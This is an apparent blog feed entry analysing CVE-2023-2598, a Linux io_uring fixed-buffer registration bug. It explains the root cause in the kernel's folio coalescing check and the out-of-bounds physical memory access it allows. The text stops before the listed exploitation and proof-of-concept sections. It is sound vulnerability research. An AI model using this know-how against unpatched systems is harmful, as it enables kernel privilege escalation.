<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="/feed.xml" rel="self" type="application/atom+xml" /><link href="/" rel="alternate" type="text/html" /><updated>2026-03-14T09:35:09+00:00</updated><id>/feed.xml</id><title type="html">a place of anatomical precision</title><subtitle>A true place of anatomical precision. Yordan Stoychev&apos;s blog.</subtitle><entry><title type="html">Conquering the memory through io_uring - Analysis of CVE-2023-2598</title><link href="/cve-2023-2598/" rel="alternate" type="text/html" title="Conquering the memory through io_uring - Analysis of CVE-2023-2598" /><published>2023-11-17T14:00:00+00:00</published><updated>2023-11-17T14:00:00+00:00</updated><id>/cve-2023-2598</id><content type="html" xml:base="/cve-2023-2598/"><![CDATA[<p>Two months ago, I decided to look into the <a href="https://unixism.net/loti/what_is_io_uring.html">io_uring</a> subsystem of the Linux Kernel.</p>

<p>Eventually, I stumbled upon an <a href="https://www.openwall.com/lists/oss-security/2023/05/08/3">email</a> disclosing a vulnerability within io_uring. The email’s subject was <em>“Linux kernel io_uring out-of-bounds access to physical memory”</em>. It immediately piqued my interest.</p>

<p>I had to put my research on pause as preparation for this year’s European Cyber Security Challenge was sucking up most of my free time. Anyway, now that ECSC is over, I was able to look into it and decided to do a write-up of this powerful vulnerability.</p>

<h2 id="table-of-contents">Table of Contents</h2>
<ol>
  <li><a href="#io_uring_intro">The io_uring subsystem in a nutshell</a>
    <ul>
      <li><a href="#io_uring">What is io_uring?</a></li>
      <li><a href="#queues">Submission and Completion Queues</a></li>
      <li><a href="#buffers">Fixed buffers</a></li>
      <li><a href="#liburing">liburing</a></li>
    </ul>
  </li>
  <li><a href="#vulnerability">Vulnerability</a>
    <ul>
      <li><a href="#rootcause">Root Cause</a>
        <ul>
          <li><a href="#folio">Understanding page folios</a></li>
        </ul>
      </li>
    </ul>
  </li>
  <li><a href="#exploitation">Exploitation</a>
    <ul>
      <li><a href="#primitive">An Incredible Primitive</a></li>
      <li><a href="#targetobjects">Target Objects</a>
        <ul>
          <li><a href="#sockets">Sockets</a></li>
          <li><a href="#twoeggs">Two Eggs</a></li>
          <li><a href="#idsockets">Identifying the sockets</a></li>
        </ul>
      </li>
      <li><a href="#kaslr">Leaking KASLR</a></li>
      <li><a href="#privesc">Privilege Escalation</a>
        <ul>
          <li><a href="#tcp_sock">Peeling back tcp_sock</a></li>
          <li><a href="#call_usermodehelper_exec">call_usermodehelper_exec</a></li>
          <li><a href="#overlap_subprocess_info">Overlapping subprocess_info</a></li>
          <li><a href="#arguments">Setting up the arguments</a></li>
          <li><a href="#subprocess_info">Setting up subprocess_info</a></li>
        </ul>
      </li>
      <li><a href="#poc">Proof of Concept</a></li>
    </ul>
  </li>
  <li><a href="#acknowledgements">Acknowledgements</a></li>
</ol>

<h2 id="the-io_uring-subsystem-in-a-nutshell-">The io_uring subsystem in a nutshell <a name="io_uring_intro"></a></h2>
<p>I will try to provide a very short and basic introduction to the <code class="language-plaintext highlighter-rouge">io_uring</code> subsystem and its most integral components.</p>

<p>I recommend reading <a href="https://twitter.com/chompie1337">Chompie’s</a> amazing <a href="https://chompie.rip/Blog+Posts/Put+an+io_uring+on+it+-+Exploiting+the+Linux+Kernel#io_uring+What+is+it%3F">introduction to the subsystem</a> if you want to get a more complete idea of how <code class="language-plaintext highlighter-rouge">io_uring</code> works.</p>

<h3 id="what-is-io_uring-">What is io_uring? <a name="io_uring"></a></h3>
<p>In a nutshell, <code class="language-plaintext highlighter-rouge">io_uring</code> is an API for Linux allowing applications to perform “system calls” asynchronously. It provides significant performance improvements over using normal syscalls. It allows your program to not wait on blocking syscalls and because of how it is implemented, lowers the number of actual syscalls needed to be performed.</p>

<h3 id="submission-and-completion-queues-">Submission and Completion Queues <a name="queues"></a></h3>
<p>At the core of every <code class="language-plaintext highlighter-rouge">io_uring</code> implementation sit two ring buffers - the submission queue (SQ) and the completion queue (CQ). Those ring buffers are shared between the application and the kernel.</p>

<p>The application places <em>Submission Queue Entries (SQEs)</em> into the submission queue, each describing a syscall it wants performed. It then performs an <code class="language-plaintext highlighter-rouge">io_uring_enter</code> syscall to tell the kernel that there is work waiting in the submission queue.</p>
<blockquote>
  <p>It is even possible to set up submission queue polling that eliminates the need to use <code class="language-plaintext highlighter-rouge">io_uring_enter</code>, reducing the number of <em>real</em> syscalls needed to be performed to 0.</p>
</blockquote>

<p>After the kernel performs the operation it puts a <em>Completion Queue Entry (CQE)</em> into the completion queue ring buffer which can then be consumed by the application.</p>

<h3 id="fixed-buffers-">Fixed buffers <a name="buffers"></a></h3>
<p>You can register fixed buffers to be used by operations that read or write data. The pages that those buffers span will be <em><a href="https://eric-lo.gitbook.io/memory-mapped-io/pin-the-page">pinned</a></em> and mapped for use, avoiding future copies to and from user space.</p>

<p>Registration of buffers happens through the <code class="language-plaintext highlighter-rouge">io_uring_register</code> syscall with the <a href="https://manpages.debian.org/unstable/liburing-dev/io_uring_register.2.en.html#IORING_REGISTER_BUFFERS">IORING_REGISTER_BUFFERS</a> operation. A registered buffer is then used by submitting an <code class="language-plaintext highlighter-rouge">IORING_OP_READ_FIXED</code> or <code class="language-plaintext highlighter-rouge">IORING_OP_WRITE_FIXED</code> operation whose SQE refers to the buffer by its index. The <a href="https://manpages.debian.org/unstable/liburing-dev/io_uring_enter.2.en.html#IOSQE_BUFFER_SELECT">IOSQE_BUFFER_SELECT</a> SQE flag, by contrast, belongs to the separate provided-buffers mechanism.
For an example use case, check <a href="https://unixism.net/loti/tutorial/fixed_buffers.html">this</a> out.</p>

<p>As <em>fixed buffers</em> are the protagonist of our story, we will see more of them later.</p>

<h3 id="liburing-">liburing <a name="liburing"></a></h3>
<p>Thankfully there is a library that provides helpers for setting up <code class="language-plaintext highlighter-rouge">io_uring</code> instances and interacting with the subsystem - <a href="https://github.com/axboe/liburing">liburing</a>. It simplifies operations like setting up buffers, producing SQEs, collecting CQEs, and so on.</p>

<p>It provides a simplified interface to <code class="language-plaintext highlighter-rouge">io_uring</code> that developers (<em>including exploit developers</em>) can use to make their lives easier.</p>

<p>As <code class="language-plaintext highlighter-rouge">liburing</code> is maintained by Jens Axboe, the maintainer of <code class="language-plaintext highlighter-rouge">io_uring</code>, it can be relied upon to be up-to-date with the kernel-side changes.</p>

<h2 id="vulnerability-">Vulnerability <a name="vulnerability"></a></h2>
<blockquote>
  <p>A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer.</p>
</blockquote>

<p>The vulnerability was introduced in version 6.3-rc1 (commit <code class="language-plaintext highlighter-rouge">57bebf807e2a</code>) and was patched in 6.4-rc1 (commit <code class="language-plaintext highlighter-rouge">776617db78c6</code>).</p>

<h3 id="root-cause-">Root Cause <a name="rootcause"></a></h3>
<p>The root cause of the vulnerability is a faulty optimization when buffers are registered.</p>

<p>Buffers get registered through an <code class="language-plaintext highlighter-rouge">io_uring_register</code> system call by passing the <code class="language-plaintext highlighter-rouge">IORING_REGISTER_BUFFERS</code> opcode. This invokes <code class="language-plaintext highlighter-rouge">io_sqe_buffers_register</code>, which in turn calls <code class="language-plaintext highlighter-rouge">io_sqe_buffer_register</code> to register each of the buffers. This is where the vulnerability arises.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* io_uring/rsrc.c */</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">io_sqe_buffer_register</span><span class="p">(</span><span class="k">struct</span> <span class="n">io_ring_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">iovec</span> <span class="o">*</span><span class="n">iov</span><span class="p">,</span>
				  <span class="k">struct</span> <span class="n">io_mapped_ubuf</span> <span class="o">**</span><span class="n">pimu</span><span class="p">,</span>
				  <span class="k">struct</span> <span class="n">page</span> <span class="o">**</span><span class="n">last_hpage</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">io_mapped_ubuf</span> <span class="o">*</span><span class="n">imu</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">page</span> <span class="o">**</span><span class="n">pages</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="c1">// important to remember: *struct page* refers to physical pages</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">off</span><span class="p">;</span>
	<span class="kt">size_t</span> <span class="n">size</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">ret</span><span class="p">,</span> <span class="n">nr_pages</span><span class="p">,</span> <span class="n">i</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">folio</span> <span class="o">*</span><span class="n">folio</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="o">*</span><span class="n">pimu</span> <span class="o">=</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">dummy_ubuf</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_base</span><span class="p">)</span> <span class="c1">// if base is NULL</span>
		<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>

	<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
	<span class="n">pages</span> <span class="o">=</span> <span class="n">io_pin_pages</span><span class="p">((</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_base</span><span class="p">,</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_len</span><span class="p">,</span>
				<span class="o">&amp;</span><span class="n">nr_pages</span><span class="p">);</span> <span class="c1">// pins the pages that the iov occupies</span>
	<span class="c1">// returns a pointer to an array of *page* pointers </span>
	<span class="c1">// and sets nr_pages to the number of pinned pages</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">pages</span><span class="p">))</span> <span class="p">{</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="n">PTR_ERR</span><span class="p">(</span><span class="n">pages</span><span class="p">);</span>
		<span class="n">pages</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>
    <span class="p">...</span>
</code></pre></div></div>
<p>Let’s first make clear what our “building blocks” are and what they are used for.</p>

<p>The function takes four arguments: the context, an <code class="language-plaintext highlighter-rouge">iovec</code> pointer, a pointer to an <code class="language-plaintext highlighter-rouge">io_mapped_ubuf</code> pointer (the output) and a pointer to <code class="language-plaintext highlighter-rouge">last_hpage</code> (used only for huge page accounting and not relevant to the bug).</p>

<p>An <code class="language-plaintext highlighter-rouge">iovec</code> is just a structure that describes a buffer, with the start address of the buffer and its length. Nothing more.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">iovec</span>
<span class="p">{</span>
	<span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">iov_base</span><span class="p">;</span>	<span class="c1">// the address at which the buffer starts</span>
	<span class="n">__kernel_size_t</span> <span class="n">iov_len</span><span class="p">;</span> <span class="c1">// the length of the buffer in bytes</span>
<span class="p">};</span>
</code></pre></div></div>
<p>When we pass a buffer to be registered we pass it as an <code class="language-plaintext highlighter-rouge">iovec</code>. In this function, the <code class="language-plaintext highlighter-rouge">iov</code> pointer points to a structure describing the buffer that the user wants to register.</p>

<p>An <code class="language-plaintext highlighter-rouge">io_mapped_ubuf</code> is a structure that holds the information about a buffer that has been registered to an <code class="language-plaintext highlighter-rouge">io_uring</code> instance.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">io_mapped_ubuf</span> <span class="p">{</span>
	<span class="n">u64</span>		<span class="n">ubuf</span><span class="p">;</span> <span class="c1">// the address at which the buffer starts</span>
	<span class="n">u64</span>		<span class="n">ubuf_end</span><span class="p">;</span> <span class="c1">// the address at which it ends</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>	<span class="n">nr_bvecs</span><span class="p">;</span> <span class="c1">// how many bio_vec(s) are needed to address the buffer </span>
	<span class="kt">unsigned</span> <span class="kt">long</span>	<span class="n">acct_pages</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">bio_vec</span>	<span class="n">bvec</span><span class="p">[];</span> <span class="c1">// array of bio_vec(s)</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The last member of <code class="language-plaintext highlighter-rouge">io_mapped_ubuf</code> is an array of <code class="language-plaintext highlighter-rouge">bio_vec(s)</code>. A <code class="language-plaintext highlighter-rouge">bio_vec</code> is kind of like an <code class="language-plaintext highlighter-rouge">iovec</code> but for physical memory. It defines a contiguous range of physical memory addresses.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">bio_vec</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">page</span>	<span class="o">*</span><span class="n">bv_page</span><span class="p">;</span> <span class="c1">// the first page associated with the address range</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>	<span class="n">bv_len</span><span class="p">;</span> <span class="c1">// length of the range (in bytes)</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>	<span class="n">bv_offset</span><span class="p">;</span> <span class="c1">// start of the address range relative to the start of bv_page</span>
<span class="p">};</span>
</code></pre></div></div>
<p>And <code class="language-plaintext highlighter-rouge">struct page</code> is of course just a structure describing a physical page of memory.</p>

<p>In the code snippet above, the pages that the <code class="language-plaintext highlighter-rouge">iov</code> spans get pinned to memory ensuring they stay in the main memory and are exempt from paging. An array <code class="language-plaintext highlighter-rouge">pages</code> is returned that contains pointers to the <code class="language-plaintext highlighter-rouge">struct page(s)</code> that the <code class="language-plaintext highlighter-rouge">iov</code> spans and <code class="language-plaintext highlighter-rouge">nr_pages</code> gets set to the number of pages.</p>
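<p>How many pages a given <code class="language-plaintext highlighter-rouge">iovec</code> spans follows from simple address arithmetic. The sketch below is a userland illustration of that arithmetic, assuming 4096-byte pages; <code class="language-plaintext highlighter-rouge">pages_spanned</code> and <code class="language-plaintext highlighter-rouge">offset_in_page</code> are hypothetical helper names, not kernel functions.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_PAGE_SHIFT 12 /* assumption: 4096-byte pages */
#define TOY_PAGE_SIZE  ((uintptr_t)1 << TOY_PAGE_SHIFT)

/* Number of pages touched by the byte range [base, base + len). */
static unsigned long pages_spanned(uintptr_t base, size_t len)
{
	uintptr_t first, end;

	assert(len > 0);
	first = base >> TOY_PAGE_SHIFT;
	/* round the end address up to the next page boundary */
	end = (base + len + TOY_PAGE_SIZE - 1) >> TOY_PAGE_SHIFT;
	return (unsigned long)(end - first);
}

/* Offset of base within its page, i.e. base & ~PAGE_MASK in kernel terms. */
static unsigned long offset_in_page(uintptr_t base)
{
	return (unsigned long)(base & (TOY_PAGE_SIZE - 1));
}
```

<p>A page-aligned buffer of exactly one page spans a single page, while the same length starting in the middle of a page spans two.</p>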

<p>Let’s now continue with <code class="language-plaintext highlighter-rouge">io_sqe_buffer_register</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="p">...</span>
	<span class="cm">/* If it's a huge page, try to coalesce them into a single bvec entry */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">nr_pages</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// if more than one page</span>
		<span class="n">folio</span> <span class="o">=</span> <span class="n">page_folio</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="c1">// converts from page to folio</span>
		<span class="c1">// returns the folio that contains this page</span>
		<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">nr_pages</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
			<span class="k">if</span> <span class="p">(</span><span class="n">page_folio</span><span class="p">(</span><span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="o">!=</span> <span class="n">folio</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// different folios -&gt; not physically contiguous </span>
				<span class="n">folio</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="c1">// set folio to NULL as we cannot coalesce into a single entry</span>
				<span class="k">break</span><span class="p">;</span>
			<span class="p">}</span>
		<span class="p">}</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">folio</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// if all the pages are in the same folio</span>
			<span class="n">folio_put_refs</span><span class="p">(</span><span class="n">folio</span><span class="p">,</span> <span class="n">nr_pages</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span> 
			<span class="n">nr_pages</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// sets nr_pages to 1 as it can be represented as a single folio page</span>
		<span class="p">}</span>
	<span class="p">}</span>
    <span class="p">...</span>
</code></pre></div></div>
<p>Here if the <code class="language-plaintext highlighter-rouge">iov</code> spans more than a single physical page, the kernel will loop through <code class="language-plaintext highlighter-rouge">pages</code> to check if they belong to the same <code class="language-plaintext highlighter-rouge">folio</code>. But what even is <code class="language-plaintext highlighter-rouge">folio</code>?</p>

<h4 id="understanding-page-folios-">Understanding page folios <a name="folio"></a></h4>
<p>To understand what a <code class="language-plaintext highlighter-rouge">folio</code> is we need to first understand what a page really is <em>according to the kernel</em>. Usually by <em>a page</em> people mean the smallest block of physical memory which can be mapped by the kernel (most commonly 4096 bytes but might be larger). Well, that isn’t really what a <em>page</em> is in the context of the kernel. The definition has been expanded to include compound pages which are multiple contiguous <em>single</em> pages - which makes things confusing.</p>

<p>Compound pages have a “head page” that holds the information about the compound page and is marked to make clear the nature of the compound page. All the “tail pages” are marked as such and contain a pointer to the “head page”. But that creates a problematic ambiguity - if a <code class="language-plaintext highlighter-rouge">page</code> pointer for a tail page is passed to a function, is the function supposed to act on just that singular page or the whole compound page?</p>

<p>So to address this confusion the concept of “page folios” was introduced. A “page folio” is essentially a page that is <em>guaranteed</em> to <strong>not</strong> be a tail page. This clears up the ambiguity, as functions that are not meant to operate on singular tail pages will take a <code class="language-plaintext highlighter-rouge">struct folio *</code> as an argument instead of a <code class="language-plaintext highlighter-rouge">struct page *</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">folio</span> <span class="p">{</span>
       <span class="k">struct</span> <span class="n">page</span> <span class="n">page</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">folio</code> structure is just a wrapper around <code class="language-plaintext highlighter-rouge">page</code>. It should be noted that every page is a part of a <code class="language-plaintext highlighter-rouge">folio</code>. The folio of a non-compound page is the page itself. Now that we know what a page folio is, we can dissect the coalescing loop in <code class="language-plaintext highlighter-rouge">io_sqe_buffer_register</code>.</p>

<p>The coalescing loop in <code class="language-plaintext highlighter-rouge">io_sqe_buffer_register</code> is meant to identify whether the pages spanned by the buffer being registered are part of a single compound page. It iterates through the pages and checks if their folio is the same. If so, it sets the number of pages <code class="language-plaintext highlighter-rouge">nr_pages</code> to <code class="language-plaintext highlighter-rouge">1</code> and leaves the <code class="language-plaintext highlighter-rouge">folio</code> variable set. Now here comes the issue…</p>

<p>The code that checks if the pages are from the same folio doesn’t actually check if they are consecutive. It can be the same page mapped multiple times. During the iteration <code class="language-plaintext highlighter-rouge">page_folio(page)</code> would return the same folio again and again passing the checks. This is an obvious logic bug. Let’s continue with <code class="language-plaintext highlighter-rouge">io_sqe_buffer_register</code> and see what the fallout is.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="p">...</span>
	<span class="n">imu</span> <span class="o">=</span> <span class="n">kvmalloc</span><span class="p">(</span><span class="n">struct_size</span><span class="p">(</span><span class="n">imu</span><span class="p">,</span> <span class="n">bvec</span><span class="p">,</span> <span class="n">nr_pages</span><span class="p">),</span> <span class="n">GFP_KERNEL</span><span class="p">);</span> 
	<span class="c1">// allocates imu with an array for nr_pages bio_vec(s)</span>
	<span class="c1">// bio_vec - a contiguous range of physical memory addresses</span>
	<span class="c1">// we need a bio_vec for each (physical) page</span>
    <span class="c1">// in the case of a folio - the array of bio_vec(s) will be of size 1</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">imu</span><span class="p">)</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>

	<span class="n">ret</span> <span class="o">=</span> <span class="n">io_buffer_account_pin</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">pages</span><span class="p">,</span> <span class="n">nr_pages</span><span class="p">,</span> <span class="n">imu</span><span class="p">,</span> <span class="n">last_hpage</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">unpin_user_pages</span><span class="p">(</span><span class="n">pages</span><span class="p">,</span> <span class="n">nr_pages</span><span class="p">);</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">off</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_base</span> <span class="o">&amp;</span> <span class="o">~</span><span class="n">PAGE_MASK</span><span class="p">;</span>
	<span class="n">size</span> <span class="o">=</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_len</span><span class="p">;</span> <span class="c1">// sets the size to that passed by the user!</span>
	<span class="cm">/* store original address for later verification */</span>
	<span class="n">imu</span><span class="o">-&gt;</span><span class="n">ubuf</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_base</span><span class="p">;</span> <span class="c1">// user-controlled</span>
	<span class="n">imu</span><span class="o">-&gt;</span><span class="n">ubuf_end</span> <span class="o">=</span> <span class="n">imu</span><span class="o">-&gt;</span><span class="n">ubuf</span> <span class="o">+</span> <span class="n">iov</span><span class="o">-&gt;</span><span class="n">iov_len</span><span class="p">;</span> <span class="c1">// calculates the end based on the length</span>
	<span class="n">imu</span><span class="o">-&gt;</span><span class="n">nr_bvecs</span> <span class="o">=</span> <span class="n">nr_pages</span><span class="p">;</span> <span class="c1">// this would be 1 in the case of folio</span>
	<span class="o">*</span><span class="n">pimu</span> <span class="o">=</span> <span class="n">imu</span><span class="p">;</span>
	<span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">folio</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// in case of folio - we need just a single bio_vec (efficient!)</span>
		<span class="n">bvec_set_page</span><span class="p">(</span><span class="o">&amp;</span><span class="n">imu</span><span class="o">-&gt;</span><span class="n">bvec</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">pages</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">size</span><span class="p">,</span> <span class="n">off</span><span class="p">);</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">nr_pages</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> 
		<span class="kt">size_t</span> <span class="n">vec_len</span><span class="p">;</span>

		<span class="n">vec_len</span> <span class="o">=</span> <span class="n">min_t</span><span class="p">(</span><span class="kt">size_t</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="n">off</span><span class="p">);</span>
		<span class="n">bvec_set_page</span><span class="p">(</span><span class="o">&amp;</span><span class="n">imu</span><span class="o">-&gt;</span><span class="n">bvec</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">pages</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">vec_len</span><span class="p">,</span> <span class="n">off</span><span class="p">);</span>
		<span class="n">off</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="n">size</span> <span class="o">-=</span> <span class="n">vec_len</span><span class="p">;</span>
	<span class="p">}</span>
<span class="n">done</span><span class="o">:</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
		<span class="n">kvfree</span><span class="p">(</span><span class="n">imu</span><span class="p">);</span>
	<span class="n">kvfree</span><span class="p">(</span><span class="n">pages</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="err">}</span>
</code></pre></div></div>
<p>A single <code class="language-plaintext highlighter-rouge">bio_vec</code> is allocated as <code class="language-plaintext highlighter-rouge">nr_pages = 1</code>. Both the end address stored in <code class="language-plaintext highlighter-rouge">imu-&gt;ubuf_end</code> and the length stored in <code class="language-plaintext highlighter-rouge">imu-&gt;bvec[0].bv_len</code> are derived from the user-supplied <code class="language-plaintext highlighter-rouge">iov-&gt;iov_len</code>, so the single <code class="language-plaintext highlighter-rouge">bio_vec</code> is assumed to cover the buffer’s full length in physically contiguous memory.</p>
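<p>The effect of the coalescing logic can be reproduced in a small userland model. Everything in the sketch below is a simplification with made-up names (<code class="language-plaintext highlighter-rouge">toy_page</code>, <code class="language-plaintext highlighter-rouge">toy_bvec</code>, <code class="language-plaintext highlighter-rouge">toy_register</code>): a page is modelled as a struct holding a pointer to its head page, and the <code class="language-plaintext highlighter-rouge">check_contig</code> flag switches between the flawed check and a stricter one that also requires consecutive pages, which is my reading of the idea behind the fix.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define TOY_PAGE_SIZE 4096u
#define MAX_BVECS     16

/* Model page: head points to itself for a head or non-compound page. */
struct toy_page { struct toy_page *head; };
struct toy_bvec { struct toy_page *page; size_t len; size_t off; };

/* Stand-in for page_folio(): the folio is identified by its head page. */
static struct toy_page *toy_page_folio(struct toy_page *p)
{
	return p->head;
}

/* Fills bvec[] and returns the number of entries used. */
static int toy_register(struct toy_page **pages, int nr_pages, size_t off,
			size_t size, bool check_contig, struct toy_bvec *bvec)
{
	struct toy_page *folio = NULL;
	int i;

	assert(nr_pages >= 1 && nr_pages <= MAX_BVECS);
	if (nr_pages > 1) {
		folio = toy_page_folio(pages[0]);
		for (i = 1; i < nr_pages; i++) {
			bool same = toy_page_folio(pages[i]) == folio;
			bool contig = pages[i] == pages[i - 1] + 1;

			/* the flawed variant only looks at 'same' */
			if (!same || (check_contig && !contig)) {
				folio = NULL;
				break;
			}
		}
	}
	if (folio) { /* coalesced: one bvec covering the whole length */
		bvec[0] = (struct toy_bvec){ pages[0], size, off };
		return 1;
	}
	for (i = 0; i < nr_pages; i++) { /* one bvec per page */
		size_t room = TOY_PAGE_SIZE - off;
		size_t vec_len = size < room ? size : room;

		bvec[i] = (struct toy_bvec){ pages[i], vec_len, off };
		off = 0;
		size -= vec_len;
	}
	return nr_pages;
}
```

<p>Feeding the model three pointers to the same page with the flawed check yields a single entry whose length is three pages, although only one page backs it. With the stricter check the same input falls back to three one-page entries.</p>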

<h2 id="exploitation-">Exploitation <a name="exploitation"></a></h2>
<p>Now that our logic bug is clear let’s see how it can be exploited.</p>

<h3 id="an-incredible-primitive-">An Incredible Primitive <a name="primitive"></a></h3>
<p>Let’s now imagine that we are registering a buffer that spans multiple virtual pages but each of them is the same <em>page</em> mapped again and again. This buffer is virtually contiguous, as the virtual memory is contiguous, but it isn’t <em>physically</em> contiguous. When the buffer goes through the faulty code that checks if the pages belong to a compound page, it will pass the check, fooling the kernel into believing that it spans multiple pages of a compound page while in reality it is just a single page.</p>

<p>This means that <code class="language-plaintext highlighter-rouge">imu-&gt;bvec[0].bv_len</code> will be set to the <em>virtual</em> length of the buffer because the kernel believes that the virtually contiguous memory is backed by physically contiguous memory. As we established, <code class="language-plaintext highlighter-rouge">bio_vec(s)</code> deal with physical ranges of memory. This buffer will be registered and give us access to the physical pages following the one that was mapped to construct the buffer.</p>
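<p>To make the consequence concrete, here is a toy calculation of which physical page frames a single <code class="language-plaintext highlighter-rouge">bio_vec</code>-like range covers. The struct and helper names are hypothetical and 4096-byte pages are assumed. The page is identified by a frame number instead of a <code class="language-plaintext highlighter-rouge">struct page</code> pointer to keep the arithmetic visible.</p>

```c
#include <assert.h>

#define TOY_PAGE_SIZE 4096u /* assumption: 4096-byte pages */

/* Simplified bio_vec: first page frame number, length and offset in bytes. */
struct toy_range {
	unsigned long pfn;
	unsigned int len;
	unsigned int off;
};

/* Last page frame number that the range reaches into. */
static unsigned long last_pfn_touched(const struct toy_range *r)
{
	assert(r->len > 0);
	return r->pfn + (r->off + r->len - 1) / TOY_PAGE_SIZE;
}

/* Number of page frames covered beyond the first one. */
static unsigned long pages_beyond_first(const struct toy_range *r)
{
	return last_pfn_touched(r) - r->pfn;
}
```

<p>For a range that starts at offset 0 and has the length of 500 pages, the helper reports 499 frames beyond the first one. Those are exactly the frames that the registered buffer should never have been able to reach.</p>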

